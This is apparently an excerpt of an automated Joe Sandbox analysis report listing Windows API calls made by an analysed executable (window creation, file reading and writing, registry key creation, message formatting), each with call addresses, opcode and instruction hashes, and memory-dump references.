                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3319771486-0
                                                                                                                            • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                                            • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                                                            • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                                            • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                            • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                            • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 716092398-0
                                                                                                                            • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                                            • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                                                            • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                                            • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                                            • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                                            • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                                            • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 0e0352666fd17ab1d356d9ba125a744cb1154344636c6ff56eb70bc4ed3e9319
                                                                                                                            • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                                                            • Opcode Fuzzy Hash: 0e0352666fd17ab1d356d9ba125a744cb1154344636c6ff56eb70bc4ed3e9319
                                                                                                                            • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FormatMessage
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1306739567-0
                                                                                                                            • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                            • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                                                            • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                            • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExtentPointText
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 566491939-0
                                                                                                                            • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                                            • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                                                            • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                                            • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 716092398-0
                                                                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                            • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                            • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                            • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                                                            • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                            • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFind
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1863332320-0
                                                                                                                            • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                            • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                                                            • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                            • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                            • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                                                            • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                            • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                                            • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                              • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3202724764-0
                                                                                                                            • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                            • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                                                            • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                            • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: TextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 530164218-0
                                                                                                                            • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                            • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                                                            • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                            • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2492992576-0
                                                                                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 9f26b129d564bfe00fcaedc41dfc35f11866fd4db5ee91d95e6c1a36d58de6ea
                                                                                                                            • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                                                            • Opcode Fuzzy Hash: 9f26b129d564bfe00fcaedc41dfc35f11866fd4db5ee91d95e6c1a36d58de6ea
                                                                                                                            • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
